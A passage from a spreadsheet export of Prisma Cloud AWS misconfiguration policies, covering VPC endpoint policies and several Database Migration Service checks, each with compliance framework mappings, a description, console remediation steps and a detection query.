          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA,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NIST 800-53 Rev 5, NIST SP 800-171 Revision 3,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HIPAA, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1608" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1608" s="2" t="inlineStr"/>
      <c r="D1608" t="inlineStr"/>
      <c r="E1608" t="inlineStr"/>
      <c r="F1608" t="inlineStr"/>
      <c r="G1608" t="b">
        <v>1</v>
      </c>
      <c r="H16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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1608" t="inlineStr">
        <is>
          <t>aws-describe</t>
        </is>
      </c>
      <c r="K1608" t="inlineStr">
        <is>
          <t>AWS VPC gateway endpoint policy is overly permissive</t>
        </is>
      </c>
      <c r="L1608" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1608" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1608" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1608" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1608" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1608" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1608" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1608" t="inlineStr"/>
      <c r="T1608" t="b">
        <v>0</v>
      </c>
      <c r="U1608" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1608" t="inlineStr">
        <is>
          <t>aws-describe-vpc-endpoints</t>
        </is>
      </c>
      <c r="W1608" t="inlineStr">
        <is>
          <t>This policy identifies AWS VPC gateway endpoints that have a VPC endpoint (VPCE) policy that is overly permissive. When the Principal element value is set to '*' within the access policy, the VPC gateway endpoint allows full access to any IAM user or service within the VPC using credentials from any AWS accounts. It is highly recommended to have the least privileged VPCE policy to protect the data leakage and unauthorized access.
For more details:
https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints-access.html</t>
        </is>
      </c>
      <c r="X1608" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the VPC dashboard
4. Go to 'Endpoints', from the left panel VIRTUAL PRIVATE CLOUD section
5. Select the reported VPC endpoint
6. On the 'Actions' drop-down button, click on the 'Manage policy'
8. On the 'Edit Policy' page, Choose 'Custom' policy
a. Then add policy, without the 'Everyone' grantee (i.e. '*' or 'AWS': '*') from the Principal element value with an AWS account ID (e.g. '123456789'), an AWS account ARN (e.g. 'arn:aws:iam::123456789:root') or an IAM user ARN (e.g. 'arn:aws:iam::123456789:user/vpce-admin').
b. Add a Condition clause to the policy statement to filter the endpoint access to specific entities.
9. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1608" t="inlineStr"/>
      <c r="Z1608" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-describe-vpc-endpoints' AND json.rule = vpcEndpointType equals Gateway and policyDocument.Statement[?any(Effect equals Allow and (Principal.AWS equals * or Principal equals *) and Action contains * and Condition does not exist)] exists</t>
        </is>
      </c>
      <c r="AA1608" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1608" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1608" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-691</t>
        </is>
      </c>
      <c r="AD1608" t="b">
        <v>1</v>
      </c>
      <c r="AE1608" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1608" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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8" t="inlineStr">
        <is>
          <t>4d0841e4-c65b-47b0-b8df-12c619d91c4c</t>
        </is>
      </c>
      <c r="AI1608" t="inlineStr">
        <is>
          <t>c5b73b1d-e4b8-4e8f-b76f-3dcc6f36cc76</t>
        </is>
      </c>
      <c r="AJ1608" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1608" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, PCI DSS v3.2.1, TX-RAMP Level 2, CSA CCM v.4.0.6, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, NIST SP 800-172, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v.11.2.0, CSA CCM v4.0.12, MAS TRM 2021, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.6, NIST CSF, ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, DORA, CSA CCM v.4.0.1, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v4.0.12, ISO/IEC 27017:2015, FFIEC, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of CIS Controls v8, CSA CCM v.4.0.1, MAS TRM 2021, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CHC HITRUST CSF v.9.6.0, ITSG-33, GDPR, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, CSA CCM v.4.0.6, NIST 800-53 Rev 5, MAS TRM 2021, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, ISO/IEC 27002:2013, DORA, PCI DSS v4.0, CIS Controls v7.1, ITSG-33, Sarbanes Oxley Act (SOX), HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, ISO 27002:2022, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1609" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1609" s="2" t="inlineStr"/>
      <c r="D1609" t="inlineStr"/>
      <c r="E1609" t="inlineStr"/>
      <c r="F1609" t="inlineStr"/>
      <c r="G1609" t="b">
        <v>1</v>
      </c>
      <c r="H16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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1609" t="inlineStr">
        <is>
          <t>aws-dms</t>
        </is>
      </c>
      <c r="K1609" t="inlineStr">
        <is>
          <t>AWS Database Migration Service (DMS) has expired certificates</t>
        </is>
      </c>
      <c r="L1609" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1609" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1609" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1609" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1609" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1609" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1609" t="inlineStr">
        <is>
          <t>09.ab</t>
        </is>
      </c>
      <c r="S1609" t="inlineStr"/>
      <c r="T1609" t="b">
        <v>0</v>
      </c>
      <c r="U1609" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1609" t="inlineStr">
        <is>
          <t>aws-dms-certificate</t>
        </is>
      </c>
      <c r="W1609" t="inlineStr">
        <is>
          <t>This policy identifies expired certificates that are in AWS Database Migration Service (DMS). AWS Database Migration Service (DMS) Certificate service is the preferred tool to provision, manage, and deploy your DMS endpoint certificates. As a best practice, it is recommended to delete expired certificates.
For more details:
https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Security.html#CHAP_Security.SSL.ManagingCerts</t>
        </is>
      </c>
      <c r="X1609" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to 'AWS DMS' service
4. Click on 'Certificates', Choose the reported certificate
5. Make sure the reported certificate is already out of date from the 'Valid to' field
6. Click on 'Delete', to delete the expired certificate.</t>
        </is>
      </c>
      <c r="Y1609" t="inlineStr"/>
      <c r="Z1609" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dms-certificate' AND json.rule = '_DateTime.ageInDays(validToDate) &gt; -1'</t>
        </is>
      </c>
      <c r="AA1609" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1609" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1609" t="inlineStr">
        <is>
          <t>PC-AWS-DMS-638</t>
        </is>
      </c>
      <c r="AD1609" t="b">
        <v>1</v>
      </c>
      <c r="AE1609" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1609" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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09" t="inlineStr">
        <is>
          <t>e1539f4f-7c9b-47bb-b3d5-9660f4ed0cda</t>
        </is>
      </c>
      <c r="AI1609" t="inlineStr">
        <is>
          <t>2c85ffbf-cd29-4731-ba1e-728d392c90c8</t>
        </is>
      </c>
      <c r="AJ1609" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1609" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" t="inlineStr">
        <is>
          <t>MAS TRM 2021, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, CIS Controls v8.1, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v1.2.1, Copy of CIS Controls v8, ISO 27002:2022, SOC 2, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, CIS Controls v7.1, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, DORA, CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, GDPR, PCI DSS v3.2.1, CRI Profile v2.0, SOC 2, NIST SP 800-171 Revision 3, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, MAS TRM 2021, ISO/IEC 27002:2013, CIS Controls v8, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B1610" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1610" s="2" t="inlineStr"/>
      <c r="D1610" t="inlineStr"/>
      <c r="E1610" t="inlineStr"/>
      <c r="F1610" t="inlineStr"/>
      <c r="G1610" t="b">
        <v>1</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1610" t="inlineStr">
        <is>
          <t>aws-dms</t>
        </is>
      </c>
      <c r="K1610" t="inlineStr">
        <is>
          <t>AWS Database Migration Service endpoint do not have SSL configured</t>
        </is>
      </c>
      <c r="L1610" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1610" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1610" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1610" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1610" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1610" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R1610" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S1610" t="inlineStr"/>
      <c r="T1610" t="b">
        <v>0</v>
      </c>
      <c r="U1610" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1610" t="inlineStr">
        <is>
          <t>aws-dms-endpoint</t>
        </is>
      </c>
      <c r="W1610" t="inlineStr">
        <is>
          <t>This policy identifies Database Migration Service (DMS) endpoints that are not configured with SSL to encrypt connections for source and target endpoints. It is recommended to use SSL connection for source and target endpoints; enforcing SSL connections help protect against 'man in the middle' attacks by encrypting the data stream between endpoint connections.
NOTE: Not all databases use SSL in the same way. An Amazon Redshift endpoint already uses an SSL connection and does not require an SSL connection set up by AWS DMS. So there are some exlcusions included in policy RQL to report only those endpoints which can be configured using DMS SSL feature. 
For more details:
https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Security.html#CHAP_Security.SSL</t>
        </is>
      </c>
      <c r="X1610" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the AWS DMS dashboard
3. In the navigation pane, choose 'Endpoints'
4. Select the reported DMS endpoint
5. Under 'Actions', choose 'Modify'
6. In the 'Endpoint configuration' section, select the 'Secure Socket Layer (SSL) mode' from the dropdown list select suitable SSL mode according to your requirement other than 'none'.
7. Click on 'Save'
NOTE: Before modifying the SSL setting, you should be configured with the proper certificate you want to use for SSL connection under the DMS 'Certificate' service. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured</t>
        </is>
      </c>
      <c r="Y1610" t="inlineStr"/>
      <c r="Z1610" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dms-endpoint' AND json.rule = status equals active and (endpointType equals SOURCE and sslMode equals none and engineName is not member of ("s3", "azuredb")) or (endpointType equals TARGET and sslMode equals none and engineName is not member of ("dynamodb", "kinesis", "neptune", "redshift", "s3", "elasticsearch", "kafka"))
{"category":"Networking","resourceTypes":["aws_dms_endpoint"]}</t>
        </is>
      </c>
      <c r="AA1610" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1610" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1610" t="inlineStr">
        <is>
          <t>PC-AWS-DMS-558-CKV2_AWS_49</t>
        </is>
      </c>
      <c r="AD1610" t="b">
        <v>1</v>
      </c>
      <c r="AE1610" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1610" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>447fc9ef-a871-4e4b-b34c-46d4aad81f51</t>
        </is>
      </c>
      <c r="AI1610" t="inlineStr">
        <is>
          <t>61764822-555e-4492-b9d6-0b5210e11ee4</t>
        </is>
      </c>
      <c r="AJ1610" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1610" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, SOC 2, TX-RAMP Level 1, ITSG-33, SOC 2, SOC 2, ITSG-33, TX-RAMP Level 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B1611" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1611" s="2" t="inlineStr"/>
      <c r="D1611" t="inlineStr"/>
      <c r="E1611" t="inlineStr"/>
      <c r="F1611" t="inlineStr"/>
      <c r="G1611" t="b">
        <v>1</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1611" t="inlineStr">
        <is>
          <t>aws-dms</t>
        </is>
      </c>
      <c r="K1611" t="inlineStr">
        <is>
          <t>AWS DMS replication instance is publicly accessible</t>
        </is>
      </c>
      <c r="L1611" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1611" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1611" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1611" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1611" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1611" t="inlineStr">
        <is>
          <t>164.312(e)</t>
        </is>
      </c>
      <c r="R1611" t="inlineStr">
        <is>
          <t>164.312(e)(2)(i)</t>
        </is>
      </c>
      <c r="S1611" t="inlineStr"/>
      <c r="T1611" t="b">
        <v>0</v>
      </c>
      <c r="U1611" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1611" t="inlineStr">
        <is>
          <t>aws-dms-replication-instance</t>
        </is>
      </c>
      <c r="W1611" t="inlineStr">
        <is>
          <t>This policy identifies AWS DMS (Database Migration Service) replication instances with public accessibility enabled.
A DMS replication instance is used to connect and read the source data and prepare it for consumption by the target data store. When AWS DMS replication instances are publicly accessible, it increases the risk of unauthorized access, data breaches, and potentially malicious activities.
It is recommended to disable the public accessibility of DMS replication instances to decrease the attack surface.</t>
        </is>
      </c>
      <c r="X1611" t="inlineStr">
        <is>
          <t>Public accessibility can be disabled only at the time of creation, please follow the below steps to create a new DMS replication instance:
1. Sign in to the AWS Management Console and navigate to the AWS DMS console.
2. In the navigation pane, choose 'Replication instances' and then click the 'Create replication instance' button.
3. Under the 'Connectivity and security' section, Leave the 'Publicly accessible' option unchecked to ensure that the replication instance does not have public IP addresses or DNS names.
4. Configure other settings based on your requirements.
5. Click the 'Create replication instance' button to create the replication instance.
To delete the reported AWS DMS replication instance, Please follow the below steps:
1. Sign in to the AWS Management Console and navigate to the AWS DMS console.
2. In the navigation pane, choose 'Replication instances' to see a list of your existing replication instances.
3. Select the replication instance that you want to delete from the list.
4. After selecting the replication instance, choose 'Actions' and then 'Delete' from the menu.
5. A confirmation dialog box will appear. Review the details and confirm that you want to delete the replication instance by selecting the 'Delete' button. 
Build Recommendation: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/public_13
IaC: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/public_13</t>
        </is>
      </c>
      <c r="Y1611" t="inlineStr"/>
      <c r="Z1611" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dms-replication-instance' AND json.rule = replicationInstanceStatus is not member of ('creating','deleted','deleting') and publiclyAccessible is true
{"category":"Public","resourceTypes":["aws_dms_replication_instance"]}</t>
        </is>
      </c>
      <c r="AA1611" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1611" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1611" t="inlineStr">
        <is>
          <t>PC-AWS-DMS-1131-CKV_AWS_89</t>
        </is>
      </c>
      <c r="AD1611" t="b">
        <v>1</v>
      </c>
      <c r="AE1611" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1611" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>a1497898-ea75-4d3b-b806-b9cae5442771</t>
        </is>
      </c>
      <c r="AI1611" t="inlineStr">
        <is>
          <t>b6085a88-3c26-466d-9039-c225d754c5ae</t>
        </is>
      </c>
      <c r="AJ1611" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1611" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B1612" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1612" s="2" t="inlineStr"/>
      <c r="D1612" t="inlineStr"/>
      <c r="E1612" t="inlineStr"/>
      <c r="F1612" t="inlineStr"/>
      <c r="G1612" t="b">
        <v>1</v>
      </c>
      <c r="H16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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1612" t="inlineStr">
        <is>
          <t>aws-dms</t>
        </is>
      </c>
      <c r="K1612" t="inlineStr">
        <is>
          <t>AWS DMS replication instance automatic version upgrade disabled</t>
        </is>
      </c>
      <c r="L1612" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1612" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1612" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1612" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1612" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1612" t="inlineStr">
        <is>
          <t>Control 7</t>
        </is>
      </c>
      <c r="R1612" t="inlineStr">
        <is>
          <t>Safeguard 7.1 : Establish and Maintain a Vulnerability Management Process</t>
        </is>
      </c>
      <c r="S1612" t="inlineStr"/>
      <c r="T1612" t="b">
        <v>0</v>
      </c>
      <c r="U1612" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1612" t="inlineStr">
        <is>
          <t>aws-dms-replication-instance</t>
        </is>
      </c>
      <c r="W1612" t="inlineStr">
        <is>
          <t>This policy identifies the AWS DMS(Database Migration Service) replication instances that do not have auto minor version upgrade feature enabled
A replication instance in DMS is a compute resource used to replicate data between a source and target database during the migration or ongoing replication process. Failure to enable automatic minor upgrades can leave your database instances vulnerable to security risks stemming from outdated software.
It is recommended to enable automatic minor version upgrades on DMS replication instances to receive timely patches and updates, reduce the risk of security vulnerabilities and improve overall performance and stability.</t>
        </is>
      </c>
      <c r="X1612" t="inlineStr">
        <is>
          <t>To modify an AWS DMS(Database Migration Service) Replication Instance's Automatic version upgrade using the AWS console, follow these steps:
1. Sign in to the AWS Management Console.
2. In the console, select the specific region from the region dropdown in the top right corner, for which the alert is generated.
3. Go to the DMS console by either searching for 'DMS' in the AWS services search bar or navigating directly to the DMS service.
4. From the navigation pane on the left, select 'Replication Instances' under the 'Migrate data' section.
5. Select the replication instance that is reported and select 'Modify' from the 'Action' dropdown in the right corner.
6. Under the 'Maintenance' section, choose the 'Yes' option for the 'Automatic version upgrade'.
7. Under the 'When to apply the modifications' section, choose 'Apply immediately' or 'Apply during the next scheduled maintenance window' according to your business requirements.
8. Click 'Save' to save the changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dms-instance-receives-all-minor-updates-automatically
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dms-instance-receives-all-minor-updates-automatically</t>
        </is>
      </c>
      <c r="Y1612" t="inlineStr"/>
      <c r="Z1612" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dms-replication-instance' AND json.rule = replicationInstanceStatus equals "available" and autoMinorVersionUpgrade is false
{"category":"General","resourceTypes":["aws_dms_replication_instance"]}</t>
        </is>
      </c>
      <c r="AA1612" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1612" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1612" t="inlineStr">
        <is>
          <t>PC-AWS-DMS-1155-CKV_AWS_222</t>
        </is>
      </c>
      <c r="AD1612" t="b">
        <v>1</v>
      </c>
      <c r="AE1612" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1612" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>de8ad979-6aa5-460e-b630-c7c79a8a3765</t>
        </is>
      </c>
      <c r="AI1612" t="inlineStr">
        <is>
          <t>677f11a4-3238-4940-90f2-a5b9ff25fbaa</t>
        </is>
      </c>
      <c r="AJ1612" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1612" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B1613" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1613" s="2" t="inlineStr"/>
      <c r="D1613" t="inlineStr"/>
      <c r="E1613" t="inlineStr"/>
      <c r="F1613" t="inlineStr"/>
      <c r="G1613" t="b">
        <v>1</v>
      </c>
      <c r="H16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613" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1613" t="inlineStr">
        <is>
          <t>aws-dms</t>
        </is>
      </c>
      <c r="K1613" t="inlineStr">
        <is>
          <t>AWS DMS replication task for the source database have logging not set to the minimum severity level</t>
        </is>
      </c>
      <c r="L1613" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
